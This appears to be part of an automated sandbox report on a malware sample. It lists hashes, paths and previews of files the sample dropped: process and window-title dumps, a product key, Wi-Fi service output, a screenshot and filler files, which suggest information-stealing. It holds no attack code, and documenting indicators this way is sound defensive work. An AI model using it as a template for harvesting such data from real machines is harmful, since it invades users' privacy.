                                                                  Preview:RAYHIWGKDIRTARQYQWOBCGSCZTUKIHKHGIDMMEQIAQREXBEXSICMBOCZGGWHBLUMCKDMBQEITRPKYTMYLFIYWQOJESATZEPWZIOXPWBQZTJXLAJZABRWIVUBVJFSNDCHMUKOSZLAGXHWLJOZTOGXVRCKZUWMQJXXEBALSHWQQWMZSSNQPYAVMCOWPGIQXROQBVBCHGZFDUPLKTFJZFLPQAZUSOCBPSHUJTOHHLCAJMVXHEMQRTWBFOCSIQLCVPUVRLGBXUQDWIUHVAEKDXVYQFLOJKPUTQAUYMMBEAALRHWXLPSGJQAXQEKMLZIZODFPAFRSSEYDMLJMRHMTAAIXEFUIILJKVGEZOYKKWEPVJQVNYFFYKRTQETFXFNAJIKRVPASKSGPKFCKZPAWWPVZRALMCBKRDOEIBIKKTHQIKXETYHIXFIDXRTNRQTJUYJKPFSYLHGPQHDQCLEGRHMOWEKRHPYXHYBEJRWKNVHYVSFWCDDPTNQKIIPYEUERDNPUHTABOGALJFLNCHFVUUXYWKPWLFGSGGMLBJNUKSZDRMWINHKUODGVGUBXUFJZPIOPPUJJYPIYBSMFJDODMOMNHZLFGXCLRVZWGCTYATVPBVTSKSTKWSAFNJQHUTMYXATQBLVEOPUSEAHMLQDLRSJXGJWRUIJXFKGYOEOWEZOSKCJPIVESIUXOBETKSWFUVRRKSLBTDFQSCFNKQERIRRRREBLOQVLIDYLYKYFMCQBLBQTNJMMMKSVARWYDTJAARNVMOUPHYNYYQMCBERSBXMHXDBNYDZXQLRKYTIFDCWTEPNQGQDWHEMKECWRJGPESGZBVSBOMTJRUQQIBGIJFHOYKRJHNKMSSTEXXZGWSIGMLAJNJNUENSYJRBGUJKNETIMQHONDPCBMBYBIBNOHNJQYWEOHOCGOHXGWYYBPTHRZNFMHKEAHSEPDNXXSDYRREJULDTKDSLQABJKBZDQSIPXTUMOMUNOTGBAJQSBTRFIGSLC
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.695685570184741
                                                                  Encrypted:false
                                                                  SSDEEP:24:SYuCgqv/1uycbC6SHsJPWXpOxTeVtblICcFX4xlyzK7y45wR39IRh:S1CPvsC6YE+XgleVtbQuKGf5M39IRh
                                                                  MD5:A28F7445BB3D064C83EB9DBC98091F76
                                                                  SHA1:D4E174D2D26333FCB66D3FD84E3D0F67AF41D182
                                                                  SHA-256:10A802E683A2C669BB581DE0A192C8291DD2D53D89A2883A59CC29EB14453B93
                                                                  SHA-512:42526FEC4220E50DB60BD7D83A07DEB9D5BE4F63AD093B518E9ECC86B779210B0170F6F64C9F16064D50CB12F03643BAC9995D4F3C0AFD5F8D38428D57ADE487
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.701757898321461
                                                                  Encrypted:false
                                                                  SSDEEP:24:JTbqccbbEKOWHOHPG9HXJMTwDwW63KkUdx/d:JTbmzOxeRaTaq3KBL/d
                                                                  MD5:520219000D5681B63804A2D138617B27
                                                                  SHA1:2C7827C354FD7A58FB662266B7E3008AFB42C567
                                                                  SHA-256:C072675E83E91FC0F8D89A2AEC6E3BC1DB53ADF7601864DDC27B1866A8AEEF4D
                                                                  SHA-512:C558140907F6C78EB74EE0F053B0505A8BB72692B378F25B518FA417D97CCB2D0A8341691BECAA96ADCE757007D6DC2938995D983AAC65024123BB63715EBD7C
                                                                  Malicious:false
                                                                  Preview:VLZDGUKUTZXKWULZBWDOTEIBVHVGPZOMETVGLHEKQQVYNUMUAOLBNSHZYTRKXENILISUHDAEEZWZEUNNMWJTKJJOLHKIGJBIHEMLZPVHEUDLHUZCSBUYGAPQSLHCFWHXEYFYTFGZTQNGXBIUAIOYCCCESLXKQMZDVXCDPKMYSWUFQOOGYCQASGJXLVOEKXBOBXDUKGAWAMSEHSFOUBZESSHGPVUWBSAXMDDSNTFJRIJVCYNCFLCMAYHAQBOVOYCQICAPOEIAOZZDHRFCBPBIJRAALGUMCZXSSRKWWTLWRCAGMBKLQATMELORFDRFOPMXYZUWVDECUBFKJYGAVNPIZHJACVPSNOSYGMZANGHNGZCHMGRVBLZWYXERUYHSGKNYMBIUOUVRRQZNFUEYVDSYNZOGCQQJBPAGGARUGCQGPSYMVKYFEATFTUASPFCLAYVPLRCXWCNIABDDVKSFBVZOWZJRZCFQZOXEFZYNRBPBMSHMJFACGUVZUTNGJUEWYWGPCEUFNJTHREUEIHDYXUSJMKBAJVWGYJBJZIRJSRNLDQEVFZAKVMKFJSIHDAKHIEZERYMCSJLFMAKTAGUIBEYUESOJBCXDNFVMNZJABIUVYPQJTWFYBZJPMWLOIHNHFGQHJMNWDFCATRHJYRIXKFJEEOLVSFDPTZNPUFUNEEOLRHVCPOPPOMEZBYTGJKKWUQRHCTFVKQBJAPTOLZADSWVPJYRGRDUWSTNCXLPQDMPVWSSFEHFWHSYNGNHOYZMFADSOTZRZJWXBGUPDZLPMKTZHVIXOFUFHPBTLFRGMMRKOTCWSSRSSXZJNZJGFXMQMXYXKQOFUEAKEJMGPTQUQWYKCZWFGOGJXTRBDEBXQWSDHUFBWIRPNOOENTWWFRIBLZBMAFTMZPLFLLVKTGMUXNKLRFNYLEFNKJWPWNLANWBRDASFRDJUPHVZRHEFBINQCKMOVMQOLDBWPTMYMMFRCLWITZRVFLDSOIFRMJCCQXYLT
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.688284131239007
                                                                  Encrypted:false
                                                                  SSDEEP:24:94BsLCi4I4Bpno3+PqX1T1MziEko3RYNdEK:alI4BjP4x9JGK
                                                                  MD5:E8ACCA0F46CBA97FE289855535184C72
                                                                  SHA1:059878D0B535AEE9092BF82886FC68DC816D9F08
                                                                  SHA-256:CFB1D698291CFF6EFE21CB913EDEB823FA6F84B5F437F61ED9E04C6A80CC4DCD
                                                                  SHA-512:185601B848EDE2A752D1DC0534A2593231C67AF68E506DD3BA05D93435780F378250B27898CBD61F225C5FE6AB72CD21638C6159FC2D107767D2AB43547E0E71
                                                                  Malicious:false
                                                                  Preview:WUTJSCBCFXNSEWGLWGYOOQVVDPFNFUMPQAJVNXNKMXQRORVUIYYNQWAMOZTIZPEADOKEPDLVMNENFIICEKOTBVPODCEHVNDEMTCADGQBTUSRFDCQOFZZQCSIEKBJNREDYYVFOXFLSAVVRDBODQPUEQUZAVGFLXOWSKRTDQOYTNPZUFOPXFJPIZPUZNQGPAVLZQOLZQMEBSIDSSSOCJNYRGTGEHRLTXLSBXCVGBOIDKKEIUHPVJXFIBUKHHHIZJXBNSFVSIBUVDLJVQHLZQNPKVUYGSBYLDPVSZZIAGXVZKTZMOMHKJTCACLNIHVZQOYHZUOCHMTDPXWSWWCTZKVXUPJXTUQVYKVNBTOOXYSOQYGOROUJYIQIBLZXWHWHSDDSIDRAQBFHFUASJJFJZGJMXLKHMELZDCBSAECBJUYDLONQSYTFIGRFXVYQXQGOAYYQXFJQFPARQPKZARUFLFZALPMOXFKFAAFQYQJSBYRLXSYWILKBWNNKNPTXDFHFCBTUEWYUGEMBZMEFHNMBDRELQEYFKIFARDWZODMHWXQBTISSHAEWZTVFJRKELIBQQEXSWFZUGGGKZXSPWOXYPOCCJIHNGOPVFNWYZRPTOWAGQPVVZLHPYYBDQTUFWFIVGYOBQSXERHTUDUHOJIRJFKQQOOIXOHPHYQPYDGSQQNOEUWFVOVYMHEJBARDLGPVSTERBBBFSGVNSUAZCVAXBSTLPAQENSALLVBNGJHCERSSMMHCALJSZJJKDFYFVTEQEUIBYNZPMUJQZNJVUGNGKENCJKNBTKBYOEUUGFFKIBVHNAUHYEUNDBZPKFZERTSXYHOMVAJJBPSNOOYHZFWINWEJCFGHKIORUHARZYNBKYMOWZHDVWQBITESVLGVECBBJDDHUCWOJFWBQJSKRWHJPPGEKBDXIPJJDDYHGUCDCBZQDUVHEBPPQBUDSOAYQTNFMYUBRJNRJFSMUCNFWURFGGIHZFMXDVIINVRGXSRYXBYBI
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.700014595314478
                                                                  Encrypted:false
                                                                  SSDEEP:24:ZUpld6DFp3zvtLC4Tmg3c0x2ngfNqdsD1OqVMyUXHt/Sv0vyjsbsV:upqDL3hO4TRc4Eq8tKvYgV
                                                                  MD5:960373CA97DEDBA8576ECF40D0D1E39D
                                                                  SHA1:E89C5AC4CF0B920C373CFA7D365C40C1009A14F6
                                                                  SHA-256:501DC438F0E931ABED9FDE388BA5A8FAE8445117823118C413F54793F0E10FD7
                                                                  SHA-512:93B34F6BC4DCEA41103E31272F2DC9CF07CC100F934CECC8F4317525DA65128DBBAD75B23CE40D46EE1DC11D10147250CAE33F01220F5624E2406B2596B726EB
                                                                  Malicious:false
                                                                  Preview:YPSIACHYXWDOAOALJCJYYKHKMGYIZBYLJSULATZCLAKGTHKIZZZPZMBAJFNQKRWGKHDEEYLGCRMYXVOJCXPRDOFVVXDFSZNRLGLUNBQSCSVJXKHLUFNOKRCASVQNUJDYWNWTNGJYBIKCERFIRWTZVUUNKNCMUGKTMSRIVLFQTZDVSHZTYRURNPZRSHICVPPIWUNOSYRCNVXHOFETKZDTIEIOQHCHWHDXEDXBZFSWIFFLXTXQXUBJCTQSDGVAMQKTUHJAAEDEECWFOEDCAALGNKEQRGJPVEEVJPTSROUZFPHKPUHLAYRHVULFESXXGKSAIYLAVSWMISSCMRGVQGXFGFYXBQBRZHILLZQUJRQJHUVBFDBPCNUAKOXURUUUKQNRUEAXAAXWIVATBILRXVUBDTFNWUQLPZELETXDQPCWJXRRAQILAVVZFAMGUWUYYORCQNUYLSNLTNXIAWJVDTPNCZPHSWYWWTBBJECMEGHRCATJANBKSCMLVOBOTXPKGMTOJISGOTUUOFVJPAGNMHFSAFRHQUHMYURLAJVNZPEMNMUDZAUMRZHQJBWVCUSQAENWUTRFBUFUWIPJYVLYDUIBJSTTFGSFBHTKIXJNVJUYJGSHZHMDONOHBMLQDTHGTPLYVKGUXWHEYTHTWOOMQOGUFQGRWUYBVWILTRHBAIJHZKXNAQYAIZBPYWWZSBDWNPRWGFXHNPFFMHKCCERIWCTACKIVXLZBNOTBYDOPJBYTZWNSXYXVYPHAGUHBXKPPAFNZGWEKOBPXTCLBIOEIVWLELPXJAINCDBEUOIFMNFWSRDONSGUCNGDZLIAFVNUQXZMTVJLIACGEXXESAGRKCPJNTKZHMMCTJZCLWNTNEJFUCODLVBCJHINWJYBLRXSKLVKNYGPLXGKEHMXSDKIAPHRGHBOCHQEJPMJEKRMRTLJNYNRHDPPQKJHXGYJMDUOESMBVJOBKJWUUSSZEQAGHANSYFBHIZFXSLENBLJWCHGEM
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.6994061563025005
                                                                  Encrypted:false
                                                                  SSDEEP:24:B08PKUcagX20VoXE+FZx/9wb8CokRMdpcUuDdgyzat15b9DZd7:B00KZagXRVyEC/9wbtor+DstLbXR
                                                                  MD5:A2EF8D31A8DC8EAFB642142CAE0BDDE5
                                                                  SHA1:6D33FA6AE5C8F3D94A889AF2AFBE701A8939BD4A
                                                                  SHA-256:A63D52B4D40DE4D08B155AB05F7B239F6B826D2E9AEF65D14C536CC17B117180
                                                                  SHA-512:0183DCD7C9808191B0D67319318EDB8069F15943CD9AFFDD5D905CA66471A301A3745EC2BDA93FD30400A08856F9530F8DB8A91555E910534E43591DE6588680
                                                                  Malicious:false
                                                                  Preview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
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):282
                                                                  Entropy (8bit):3.5191090305155277
                                                                  Encrypted:false
                                                                  SSDEEP:6:QyqRsioTA5wmHOlRaQmZWGokJqAMhAlt4DAlLwkAl2FlRaQmZWGokJISlVl9:QZsiL5wmHOlDmo0qmt4clLwr2FlDmo0d
                                                                  MD5:3A37312509712D4E12D27240137FF377
                                                                  SHA1:30CED927E23B584725CF16351394175A6D2A9577
                                                                  SHA-256:B029393EA7B7CF644FB1C9F984F57C1980077562EE2E15D0FFD049C4C48098D3
                                                                  SHA-512:DBB9ABE70F8A781D141A71651A62A3A743C71A75A8305E9D23AF92F7307FB639DC4A85499115885E2A781B040CBB7613F582544C2D6DE521E588531E9C294B05
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.9.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.8.4.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl6nM:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOy
                                                                  MD5:D48FCE44E0F298E5DB52FD5894502727
                                                                  SHA1:FCE1E65756138A3CA4EAAF8F7642867205B44897
                                                                  SHA-256:231A08CABA1F9BA9F14BD3E46834288F3C351079FCEDDA15E391B724AC0C7EA8
                                                                  SHA-512:A1C0378DB4E6DAC9A8638586F6797BAD877769D76334B976779CD90324029D755FB466260EF27BD1E7F9FDF97696CD8CD1318377970A1B5BF340EFB12A4FEB4A
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.2.1.8.2.4.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):190
                                                                  Entropy (8bit):3.5497401529130053
                                                                  Encrypted:false
                                                                  SSDEEP:3:QJ8ql62fEilSl7lA5wXdUSlAOlRXKQlcl5lWGlyHk15ltB+SliLlyQOnJpJSl3sY:QyqRsioTA5wmHOlRaQmZWGokJD+SkLOO
                                                                  MD5:87A524A2F34307C674DBA10708585A5E
                                                                  SHA1:E0508C3F1496073B9F6F9ECB2FB01CB91F9E8201
                                                                  SHA-256:D01A7EF6233EF4AB3EA7210C0F2837931D334A20AE4D2A05ED03291E59E576C9
                                                                  SHA-512:7CFA6D47190075E1209FB081E36ED7E50E735C9682BFB482DBF5A36746ABDAD0DCCFDB8803EF5042E155E8C1F326770F3C8F7AA32CE66CF3B47CD13781884C38
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.w.i.n.d.o.w.s...s.t.o.r.a.g.e...d.l.l.,.-.3.4.5.8.3.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):504
                                                                  Entropy (8bit):3.514398793376306
                                                                  Encrypted:false
                                                                  SSDEEP:12:QZsiL5wmHOlDmo0qmalDmo0qmN4clLwr2FlDmo0IWFSklrgl2FlDmo0qjKA1:QCGwv4o0u4o0RhlLwiF4o0HUsF4o01A1
                                                                  MD5:29EAE335B77F438E05594D86A6CA22FF
                                                                  SHA1:D62CCC830C249DE6B6532381B4C16A5F17F95D89
                                                                  SHA-256:88856962CEF670C087EDA4E07D8F78465BEEABB6143B96BD90F884A80AF925B4
                                                                  SHA-512:5D2D05403B39675B9A751C8EED4F86BE58CB12431AFEC56946581CB116B9AE1014AB9334082740BE5B4DE4A25E190FE76DE071EF1B9074186781477919EB3C17
                                                                  Malicious:false
                                                                  Preview:......[...S.h.e.l.l.C.l.a.s.s.I.n.f.o.].....L.o.c.a.l.i.z.e.d.R.e.s.o.u.r.c.e.N.a.m.e.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.7.9.....I.n.f.o.T.i.p.=.@.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.,.-.1.2.6.8.8.....I.c.o.n.R.e.s.o.u.r.c.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.i.m.a.g.e.r.e.s...d.l.l.,.-.1.1.3.....I.c.o.n.F.i.l.e.=.%.S.y.s.t.e.m.R.o.o.t.%.\.s.y.s.t.e.m.3.2.\.s.h.e.l.l.3.2...d.l.l.....I.c.o.n.I.n.d.e.x.=.-.2.3.6.....
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):17736
                                                                  Entropy (8bit):5.696924858590766
                                                                  Encrypted:false
                                                                  SSDEEP:96:HlcQuJQuwQX7QCpzQu2Q8C23ioQ11QuvkQu4QpqcBZQpUESRQq4QCYqQu6QubfwK:HzqnUEYbY/tBmIJzvww4WKc16uH2
                                                                  MD5:188BF0D4BAB63D07DCF76295F9FE4368
                                                                  SHA1:AD03D1D21A5C0D963264DD7667144360FB4B591F
                                                                  SHA-256:3F825C434813824A0AEF6BE24263B6EED7D1EB2617378AE281280690860A7C73
                                                                  SHA-512:107100A65DFD1F6867C2BCCAA8A80E8540344B9F29FFBD2B5734309C23A4C80B067CC9D2C886ED6557586530EFBA025C1ADF8C107CD57BBADD9A1783A6F76B53
                                                                  Malicious:false
                                                                  Preview:NAME: svchost..PID: 2152..EXE: C:\Windows\system32\svchost.exe..NAME: explorer..PID: 2580..EXE: C:\Windows\Explorer.EXE..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: fontdrvhost..PID: 784..EXE: C:\Windows\system32\fontdrvhost.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: smartscreen..PID: 5584..EXE: C:\Windows\System32\smartscreen.exe..NAME: dllhost..PID: 3428..EXE: C:\Windows\system32\DllHost.exe..NAME: csrss..PID: 408..EXE: ..NAME: svchost..PID: 1724..EXE: C:\Windows\
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with no line terminators
                                                                  Category:dropped
                                                                  Size (bytes):29
                                                                  Entropy (8bit):4.142295219190902
                                                                  Encrypted:false
                                                                  SSDEEP:3:O2eRntm:OrRnI
                                                                  MD5:69F1EB7DBB946D78F0D2AE0B7228257C
                                                                  SHA1:E1229CD69E21F921D135B7575A0F8E1EC5CAB0F5
                                                                  SHA-256:3240C86D3379358DB1AC976D64A510BA746F273BBCC6A16C4C88E4D0002E3F9D
                                                                  SHA-512:DAD1B6A1B744869CB2B77FEFC202E9AAA724BD3B9254C827C7F2C006A906DC3671038B1C189B965F7017E76003AECE7ADAE4DEFB7E3D6E6860258A120666E5D4
                                                                  Malicious:false
                                                                  Preview:PJN2M-GWXQB-JGFCC-DT97H-B64C4
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):84
                                                                  Entropy (8bit):4.6630509827051725
                                                                  Encrypted:false
                                                                  SSDEEP:3:PHsEiVboFkaQXMtS1ME/M2en:PsEwYVQXOS1TUn
                                                                  MD5:58CD2334CFC77DB470202487D5034610
                                                                  SHA1:61FA242465F53C9E64B3752FE76B2ADCCEB1F237
                                                                  SHA-256:59B3120C5CE1A7D1819510272A927E1C8F1C95385213FCCBCDD429FF3492040D
                                                                  SHA-512:C8F52D85EC99177C722527C306A64BA61ADC3AD3A5FEC6D87749FBAD12DA424BA6B34880AB9DA627FB183412875F241E1C1864D723E62130281E44C14AD1481E
                                                                  Malicious:false
                                                                  Preview:Active code page: 65001..The Wireless AutoConfig Service (wlansvc) is not running...
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text
                                                                  Category:dropped
                                                                  Size (bytes):13461
                                                                  Entropy (8bit):5.661557387078866
                                                                  Encrypted:false
                                                                  SSDEEP:96:okQuRQuIQuTQu7QuOQuwQuNQuHkQuQQR5HRQu5QugQuSQuyQu1KQuoQ4yzqToQuA:9mm6Nr
                                                                  MD5:2E19D87AA7C2834A564D143E94FFB72B
                                                                  SHA1:05B32AB94A1BE83DD5130EEC1D3425F876F99F62
                                                                  SHA-256:E26FE6099161CBCB45FFC873C1F972616A5176AE45BCBC5FAF8EC2E50668781E
                                                                  SHA-512:9340F24E7AB865AD93DA0E4686504B3E1DB5DB488AD1E347519901725D2A7B6A5E93E9025BA17B4FDD2ED03E026AF237DEB81CDE0307E33856E13B4234FB6684
                                                                  Malicious:false
                                                                  Preview:NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 5596..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6888..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6456..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6020..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6864..EXE: C:\Program Files (x86)\TngYOmxWCOHcplwsVDjPzApAkJfsrKZCNXGUHohfbH\KVsWtnMRbFtaGZDMHKuMpsxLwCr.exe..NAME: KVsWtnMRbFtaGZDMHKuMpsxLwCr..TITLE: New Tab - Google Chrome..PID: 6432..EXE: C:\Prog
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:JPEG image data, JFIF standard 1.01, resolution (DPI), density 96x96, segment length 16, baseline, precision 8, 1280x1024, components 3
                                                                  Category:dropped
                                                                  Size (bytes):89107
                                                                  Entropy (8bit):7.85553101074918
                                                                  Encrypted:false
                                                                  SSDEEP:1536:CBu/u2jECGPMEoXe1o8oZmGww44qaaflp2RoNVbMhj9lAOINqH5b1ocI/MgMrl6I:Gu/7UUEou1oFWw4vaaflpLVbMh7tINqJ
                                                                  MD5:DCFF6500594A6AEE43397F2C5A79B9AF
                                                                  SHA1:1E9253C373E26366AE7042480B2AA3576D268E04
                                                                  SHA-256:27A3DC512AF87F6F9D77AD11F9E1868409C133019CDB39443DC5DD11FDA0E2BC
                                                                  SHA-512:2958956281152B172393194916CD027736B6611CB2CB4A1490CA5F188148F1A259577049EC1A7AD2ABFB3EB605EE866D5D80493C877909889F5A02F843ED1634
                                                                  Malicious:false
                                                                  Process:C:\Users\user\AppData\Roaming\svchost.exe
                                                                  File Type:CSV text
                                                                  Category:dropped
                                                                  Size (bytes):425
                                                                  Entropy (8bit):5.353683843266035
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhav:ML9E4KlKDE4KhKiKhk
                                                                  MD5:859802284B12C59DDBB85B0AC64C08F0
                                                                  SHA1:4FDDEFC6DB9645057FEB3322BE98EF10D6A593EE
                                                                  SHA-256:FB234B6DAB715ADABB23E450DADCDBCDDFF78A054BAF19B5CE7A9B4206B7492B
                                                                  SHA-512:8A371F671B962AE8AE0F58421A13E80F645FF0A9888462C1529B77289098A0EA4D6A9E2E07ABD4F96460FCC32AA87B0581CA4D747E77E69C3620BF1368BA9A67
                                                                  Malicious:false
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..
                                                                  Process:C:\Users\user\Desktop\zrrHgsDzgS.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):522
                                                                  Entropy (8bit):5.358731107079437
                                                                  Encrypted:false
                                                                  SSDEEP:12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhat92n4M6:ML9E4KlKDE4KhKiKhg84j
                                                                  MD5:AE6AF1A0CB468ECBA64E2D77CB4517DB
                                                                  SHA1:09BD6366ED569ADB79274BBAB0BBF09C8244FD97
                                                                  SHA-256:3A917DCBC4952EA9A1135B379B56604B3B63198E540C653683D522445258B710
                                                                  SHA-512:E578CD0D9BF43FD1BA737B9C44B70130462CE55B4F368E2E341BB94A3A3FFA47D4A9FE714EB86926620D1B4BE9FFF4582C219DF9ACC923C765650B13C5451500
                                                                  Malicious:true
                                                                  Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..
                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  File Type:data
                                                                  Category:dropped
                                                                  Size (bytes):1216
                                                                  Entropy (8bit):5.377376311942076
                                                                  Encrypted:false
